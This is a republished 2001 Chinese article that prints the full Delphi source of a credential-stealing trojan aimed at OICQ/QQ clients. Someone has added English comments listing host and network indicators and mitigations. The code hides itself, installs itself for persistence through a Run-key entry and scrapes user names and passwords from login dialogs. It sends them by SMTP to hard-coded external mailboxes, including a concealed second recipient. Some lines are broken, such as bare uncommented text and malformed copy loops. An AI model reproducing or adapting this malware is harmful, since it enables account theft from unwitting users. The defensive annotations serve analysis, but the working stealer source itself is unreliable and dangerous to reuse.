
OICQ 远程木马的设计技术

王朝delphi·作者佚名  2006-01-08

{

****************** OICQ Hack 2001***********

*

* 2001 5.22 ver 1.1 Modify for OICQ2000b 0230

* 2001 5.25 ver 1.2 Modify for QQ2000b 0430

* Last updated: 2001.5.25

* Author :njhhack

* HackSoft Research Lab.

* Copyright(C) 2001 All rights reserved.

*

*

**********************************************

}

//---------------下面是oicqhack.dpr工程文件

program oicqhack;

uses

Windows,

Messages,

mainunit in 'mainunit.pas';

{$R *.RES}

var

wClass: TWndClass; // class struct for main window

Msg: TMSG; // message struct

// Teardown routine run by WindowProc when the hidden window receives
// WM_DESTROY: unregisters the window class and ends the process.
// classname and hInst are unit-level globals declared in mainunit.pas.
procedure ShutDown;

begin

UnRegisterClass(classname,hInst);

// The module handle value is what gets passed as the process exit code here.
ExitProcess(hInst); //end program

end;

// Window procedure of the program's only window. Every message first goes to
// DefWindowProc (whose result is returned), then three messages trigger the
// program's own logic:
//   WM_CREATE  -> wincreate  (self-copy, recipient lookup, Run-key persistence)
//   WM_TIMER   -> ontimer1   (periodic scan of all windows for login dialogs)
//   WM_DESTROY -> ShutDown   (unregister class, exit process)
// Analyst note: there is no user-facing behaviour at all in this procedure;
// the window exists only to receive timer ticks.
function WindowProc(hWnd,Msg,wParam,lParam:Longint):Longint; stdcall;

begin

Result:=DefWindowProc(hWnd,Msg,wParam,lParam);

case Msg of

WM_CREATE: wincreate;

WM_TIMER: ontimer1;

WM_DESTROY: ShutDown;

end;

end;

// Program entry point. Registers a window class, creates one tool window,
// starts a 300 ms timer and then pumps messages until the window goes away.
//
// Host indicators visible in this block (useful for triage and hunting):
//   - window class name 'HackSoft-Oicq-Password-Recoder'
//   - window titles 'OICQ 密码记录器2' (searched for) and 'OICQ 密码记录器3' (created)
// The class name is the more stable of the two, since the title differs
// between the lookup and the window this build creates.
begin

// If an older version is already running, stop it so that only this newer build runs

hmain:=Findwindow('HackSoft-Oicq-Password-Recoder','OICQ 密码记录器2');

// As written, the WM_DESTROY goes to the handle held in the global lp, not to
// the handle FindWindow just returned.
if hmain<>0 then sendmessage(lp,wm_destroy,0,0);

hInst:=GetModuleHandle(nil); // get the application instance

classname:='HackSoft-Oicq-Password-Recoder';

with wClass do

begin

Style:= CS_PARENTDC;

hIcon:= LoadIcon(hInst,'MAINICON');

lpfnWndProc:= @WindowProc;

hInstance:= hInst;

hbrBackground:= COLOR_BTNFACE+1;

lpszClassName:= classname;

hCursor:= LoadCursor(0,IDC_ARROW);

end;

RegisterClass(wClass);

// WS_EX_TOOLWINDOW keeps the window off the taskbar, and nothing in this
// block calls ShowWindow or sets WS_VISIBLE, so the window is not displayed.
// A window enumeration tool still lists it by class name.
hmain:=CreateWindowEx(WS_EX_TOOLWINDOW,classname,'OICQ 密码记录器3',WS_OVERLAPPEDWINDOW,10,10,120,80,0,0,hInst,nil);

// Create a timer used to scan the system's windows periodically (every 300 ms)

newtime:=SetTimer(hmain,0,300,nil);

// Message loop

while(GetMessage(Msg,hmain,0,0))do

begin

TranslateMessage(Msg);

DispatchMessage(Msg);

end;

// Stop the timer

killtimer(hmain,newtime);

end.

//-------下面是mainunit.pas单元文件

unit mainunit;

interface

uses

Windows,

Messages,

SysUtils,

Classes,

winsock,

registry;

const

CRLF=#13#10;

// Unit-level state shared by every routine in this unit and by oicqhack.dpr.
var

// Install directory prefix: winCreate sets it to the Windows system directory plus '\'.
spy:string;

// hinst/hmain/newtime: module handle, hidden window handle and timer id set in the .dpr.
// old/olde: window handles lpEnumFunc uses to tie a captured login dialog to the
// later "online" status window and to avoid reporting the same login twice.
hinst,hmain,newtime,count,start,max,fhand,old,olde,lp:integer;

his:array[0..100] of integer;

// Declared as integers but handed to GetSystemDirectory/strpas as a path buffer in winCreate.
syspath:array[0..200] of integer;

// Function pointer that winCreate binds to kernel32's RegisterServiceProcess on Win9x.
regservice:function(uThread:integer;uType:integer):Integer;stdcall;

libhandle:thandle;

classname:array[0..100] of char;

// items[0]=user name line, items[1]=password line, items[2]=login status, items[3]=filler;
// filled by lpEnumFunc.
items:array[0..4] of string;

// Receives the return value of the Winsock calls; no routine in this listing reads it back.
err:integer;

wsadata:twsadata;

fsocket,fport,step:integer;

SockAddrIn:TSockAddrIn;

// email: current recipient; newpass: the formatted captured text that becomes the mail body;
// fhost: SMTP server address as a dotted-quad string.
hackmail,email,newpass,fhost,s1,password:string;

// Scratch buffer for the SMTP exchange in MailSend (lpEnumFunc and winCreate declare their own sbuf).
sbuf:array[0..1024] of char;

procedure winCreate;

procedure OnTimer1;

implementation

// Modify the registry so that the program starts automatically.
//
// Writes a string value named 'oicqpass' under
// HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run whose data
// is spy + 'OICQPASS.EXE' (spy is the system directory prefix set in
// winCreate). The second argument to openkey (true) lets the key be created
// if it does not exist.
//
// Detection/mitigation: this is ordinary Run-key persistence. Alert on new
// values under this key whose data points into the system directory, and
// hunt for the value name 'oicqpass'. Note that the file name written here
// (OICQPASS.EXE) is not the name winCreate copies the binary to
// (oicqhack.exe), so both names are worth searching for. Writing to HKLM
// requires administrative rights on NT-family systems.
procedure autorun;

var reg:tregistry;

begin

reg:=tregistry.create;

reg.rootkey:=HKEY_LOCAL_MACHINE;

reg.openkey('SOFTWARE\Microsoft\Windows\CurrentVersion\Run',true);

reg.WriteString('oicqpass',spy+'OICQPASS.EXE');

reg.closekey;

reg.free;

end;

// Mail-sending sub-procedure: once a password has been captured it is sent
// back to the getoicq@21cn.com mailbox.
//
// Performs ONE step of a hand-rolled SMTP dialogue over the global socket
// FSocket: read up to 400 bytes of server reply, advance the global step
// counter, pick the command for that step, send it. SendPass calls this in a
// loop until step returns to 0.
//
// The server reply is read but never inspected: s1 is overwritten by the
// case statement for steps 1..6, and err is not checked.
//
// Network indicators visible here (all cleartext on TCP/25):
//   - 'HELO smtp.hacker.com'
//   - 'MAIL FROM: <getoicq@21cn.com>'
//   - headers From:"Oicq Hack"<www.hacker.com>, To:"getoicq"<www.password.com>
//   - 'Subject:QQ2001 Password come.'
// The message body is the global newpass, i.e. the captured user name,
// password and login status, unencrypted.
procedure MailSend;

begin

err:=recv(FSocket,sbuf,400,0);

s1:=strpas(sbuf);

inc(step);

case step of

1:s1:='HELO smtp.hacker.com'+CRLF;

2:s1:='MAIL FROM: <getoicq@21cn.com>'+CRLF;

// Recipient comes from the global email (set in winCreate / lpEnumFunc).
3:s1:='RCPT TO: <'+email+'>'+CRLF;

4:s1:='DATA'+CRLF;

5:s1:='From:"Oicq Hack"<www.hacker.com>'+CRLF

+'To:"getoicq"<www.password.com>'+CRLF

+'Subject:QQ2001 Password come.'+CRLF

+CRLF

+newpass+CRLF

+'.'+CRLF;

6:s1:='QUIT'+CRLF;

else

// Any step past 6 resets the counter, which ends the repeat loop in SendPass.
step:=0;

end;

strcopy(sbuf,pchar(s1));

err:=send(FSocket,sbuf,strlen(sbuf),MSG_DONTROUTE);

end;

// Main mail-sending procedure.
//
// Initialises Winsock 1.1, opens a TCP socket to a hard-coded SMTP server
// (202.104.32.230, port 25), drives the MailSend state machine until it
// resets step to 0, then closes the socket and cleans up Winsock.
// Every return value is stored in err and never checked, so a failed connect
// still runs the whole loop.
//
// Detection/mitigation: the exfiltration is a direct SMTP connection from a
// workstation process to an external server. Restricting outbound TCP/25 to
// sanctioned mail relays blocks it, and a non-mail process opening port 25 is
// a strong signal on its own. The IP address dates from 2001 and is
// presumably no longer meaningful as a blocklist entry.
procedure SendPass;

begin

err:=WSAStartup($0101,WSAData);

FSocket := socket(PF_INET, SOCK_STREAM,IPPROTO_IP);

// Uses smtp.21cn.com to send the mail (address is hard-coded, no DNS lookup)

fhost:='202.104.32.230';

fport:=25;

SockAddrIn.sin_addr.s_addr:=inet_addr(PChar(FHost));

SockAddrIn.sin_family := PF_INET;

SockAddrIn.sin_port :=htons(Fport);

err:=connect(FSocket,SockAddrIn, SizeOf(SockAddrIn));

step:=0;

repeat

MailSend;

until step=0;

err:=closesocket(FSocket);

err:=WSACleanup;

end;

// Window enumeration callback.
//
// Called by EnumChildWindows (see OnTimer1) once for every child window of
// the desktop. It does two things:
//   1. If the window has the ES_PASSWORD style bit set and its parent's title
//      matches one of four OICQ/QQ dialog titles, it walks the sibling
//      controls and reads the user-name and password fields with WM_GETTEXT,
//      storing them in items[0] and items[1].
//   2. For every window it reads the window text and, if it equals the
//      client's '在线' (online) or '隐身' (invisible) status string and the
//      window belongs to the same top-level window recorded in step 1, it
//      treats the login as successful and mails the captured data.
// Always returns true so enumeration continues.
//
// Defender notes: the technique depends on WM_GETTEXT returning the contents
// of a password edit control that belongs to another process. That worked on
// the Windows versions this was written for; later Windows releases restrict
// cross-process reads of password edit controls, and UIPI (Vista and later)
// blocks such messages from a lower-integrity sender. Matching is purely on
// localized window titles, so it is tied to specific client builds (the
// header names OICQ2000b 0230 and QQ2000b 0430).
// The local sbuf declared here hides the unit-level sbuf of the same name.
function lpEnumFunc(hwnd:integer;uint:integer):boolean;stdcall;

var hw,hwold,hs,wlong,hup,i:integer;

sbuf,sb3,sb2:array[0..256] of char;

sb1:string;

begin

hwold:=GetParent(hwnd);

wlong:=GetWindowLong(hwnd,GWL_STYLE);

if (wlong and ES_PASSWORD)<>0 then

begin

// Check whether this is an OICQ login

hup:=GetParent(hwnd);

sendmessage(hup,wm_gettext,100,integer(@sbuf));

// Dialog titles: 'OICQ registration wizard' / 'QQ registration wizard'
strpcopy(sb2,'OICQ 注册向导');

strpcopy(sb3,'QQ 注册向导');

if (strcomp(sbuf,sb2)=0) or (strcomp(sbuf,sb3)=0) then

begin

// Remember the window three levels above the dialog; compared later
// against the parent of the status window.
old:=GetParent(hup);

old:=GetParent(old);

old:=GetParent(old);

start:=0;

count:=1;

//items.clear;

// Skip two windows

hwnd:=Getwindow(hwnd,GW_HWNDFIRST);

hwnd:=Getwindow(hwnd,GW_HWNDNEXT);

// Get the user name

hwnd:=Getwindow(hwnd,GW_HWNDNEXT);

hw:=GetWindowTextLength(hwnd);

hs:=integer(@sbuf);

sendmessage(hwnd,wm_gettext,100,hs);

items[0]:='用户名:'+strpas(sbuf);

// Get the password

hwnd:=Getwindow(hwnd,GW_HWNDNEXT);

hw:=GetWindowTextLength(hwnd);

hs:=integer(@sbuf);

sendmessage(hwnd,wm_gettext,100,hs);

items[1]:='密码:'+strpas(sbuf);

end;

// Dialog titles: 'OICQ user login' / 'QQ user login'
strpcopy(sb2,'OICQ用户登录');

strpcopy(sb3,'QQ用户登录');

if (strcomp(sbuf,sb2)=0) or (strcomp(sbuf,sb3)=0) then

begin

// Here the reference window is two levels above the dialog.
old:=GetParent(hup);

old:=GetParent(old);

start:=0;

count:=1;

//items.clear;

// Get the user name

hwnd:=Getwindow(hwnd,GW_HWNDFIRST);

hw:=GetWindowTextLength(hwnd);

hs:=integer(@sbuf);

sendmessage(hwnd,wm_gettext,100,hs);

items[0]:='用户名:'+strpas(sbuf);

// Get the password

hwnd:=Getwindow(hwnd,GW_HWNDNEXT);

hw:=GetWindowTextLength(hwnd);

hs:=integer(@sbuf);

sendmessage(hwnd,wm_gettext,100,hs);

items[1]:='密码:'+strpas(sbuf);

end;

end;

// Check whether the client is online

hw:=GetWindowTextLength(hwnd);

hs:=integer(@sbuf);

sendmessage(hwnd,wm_gettext,100,hs);

// Status strings: 'online' / 'invisible'
strpcopy(sb2,'在线');

strpcopy(sb3,'隐身');

if (strcomp(sbuf,sb2)=0) or (strcomp(sbuf,sb3)=0) then

begin

if hwold=old then

begin

// olde holds the last window already reported, so each login is sent once.
if olde<>old then

begin

if strcomp(sbuf,sb2)=0 then items[2]:='登录成功:在线'

else items[2]:='登录成功:隐身';

items[3]:=' ';

// Send the password back to the author's mailbox getoicq@21cn.com

newpass:=format('%s %s %s %s',[items[0],items[1],items[2],items[3],items[4]);

//

// Two sends per capture: first to the configured recipient (email), then to
// a second hard-coded address. Anyone who pointed c:\email.txt at their own
// mailbox would still have every capture copied to mf001@etang.com.
hackmail:=email;

sendpass;

email:='mf001@etang.com';

sendpass;

email:=hackmail;

// Save the password to oicqpass.dll (disabled: the whole block below is
// commented out in this listing; the file name may still matter for other
// builds — unverified)

{

if fileexists(spy+'oicqpass.dll')=false then fhand:=filecreate(spy+'oicqpass.dll')

else fhand:=fileopen(spy+'oicqpass.dll',fmOpenWrite);

if fileexists(spy+'oicqpass.dll')=false then fhand:=filecreate(spy+'oicqpass.dll')

else fhand:=fileopen(spy+'oicqpass.dll',fmOpenWrite);

fileseek(fhand,0,2);

strpcopy(sbuf,items[0]+#13#10+items[1]+#13#10+items[2]+#13#10+items[3]+#13#10);

filewrite(fhand,sbuf,strlen(sbuf));

fileclose(fhand);

}

end;

olde:=old;

end;

end;

result:=true;

end;

定时器响应函数

// Timer handler, run by WindowProc on every WM_TIMER (the .dpr sets the
// interval to 300 ms). Resets the global lp to 0 and enumerates every child
// window of the desktop through lpEnumFunc, passing lp as the callback
// argument.
// Defender note: a background process enumerating all windows several times
// per second and sending WM_GETTEXT to controls it does not own is
// characteristic of this class of window-scraping credential stealer.
procedure OnTimer1;

begin

lp:=0;

EnumChildWindows(GetDesktopWindow,@lpEnumFunc,lp);

end;

// Window-creation handler, run once from WindowProc on WM_CREATE.
// In order it:
//   1. hides the process on Win9x via RegisterServiceProcess,
//   2. copies its own executable into the system directory as oicqhack.exe,
//   3. chooses the mail recipient (c:\email.txt if present, otherwise a
//      built-in default),
//   4. calls autorun to add the Run-key entry.
//
// Host indicators visible here: <system directory>\oicqhack.exe and the
// optional configuration file c:\email.txt.
procedure winCreate;

var wlong:integer;

s1:string;

s2,s3,sbuf:array[0..300] of char;

i:integer;

osver:TOSVERSIONINFO;

tmp:tmemorystream;

begin

// Get the OS version; on Win9x register as a service process to stay hidden
// (no such capability on NT).
// RegisterServiceProcess removes the process from the Win9x Ctrl+Alt+Del
// task list; on NT-family systems this branch is skipped and the process
// remains visible in the normal process list.

osver.dwOSVersionInfoSize:=sizeof(TOSVERSIONINFO);

if GetVersionEx(osver)=true then

begin

if VER_PLATFORM_WIN32_NT<>osver.dwPlatformId then

begin

LibHandle:=LoadLibrary('kernel32.dll');

if LibHandle<>0 then

begin

@regservice:=GetProcAddress(LibHandle, 'RegisterServiceProcess');

regservice(0,1);//1=hide,0=show;

FreeLibrary(LibHandle);

end;

end;

end;

max:=0;

count:=0;

// The next line is bare text in the published listing (it reads "copy the
// program to the system directory") and carries no comment marker.
将程序复制到系统目录

// ParamStr(0) is the path of the running executable. The two loops appear
// intended to move the source and destination paths into the char buffers
// s2 and s3 that copyfile receives.
s1:=ParamStr(0);

for i:=0 to length(s1) do s2:=s1[i+1];

GetSystemDirectory(@syspath,MAX_PATH);

spy:=strpas(@syspath)+'\';

s1:=spy+'oicqhack.exe';

for i:=0 to length(s1) do s3:=s1[i+1];

// Third argument false: an existing file at the destination is overwritten.
copyfile(s2,s3,false);

// Look up the target e-mail address in email.txt

if fileexists('c:\email.txt')=false then

begin

// Built-in default recipient when no configuration file exists.
email:='getoicq@21cn.com';

end else

begin

tmp:=tmemorystream.create;;

tmp.loadfromfile('c:\email.txt');

count:=tmp.size;

// strcopy(sbuf,pchar(''));

// Reads the whole file into the 301-byte local sbuf; the file size is not
// compared with the buffer size before the read.
tmp.read(sbuf,count);

tmp.free;

email:='';

for step:=0 to count-1 do email:=email+sbuf[step];

strcopy(sbuf,pchar(email));

// messagebox(0,sbuf,'',0);

end;

count:=0;

step:=0;

// Modify the registry so that the program starts automatically

autorun;

end;

end.

/////////////////////////////////////////////////////////

--------倪建华---------------

HackSoft Research Lab.

Copyright(C) 2001 All rights reserved.

 
 
 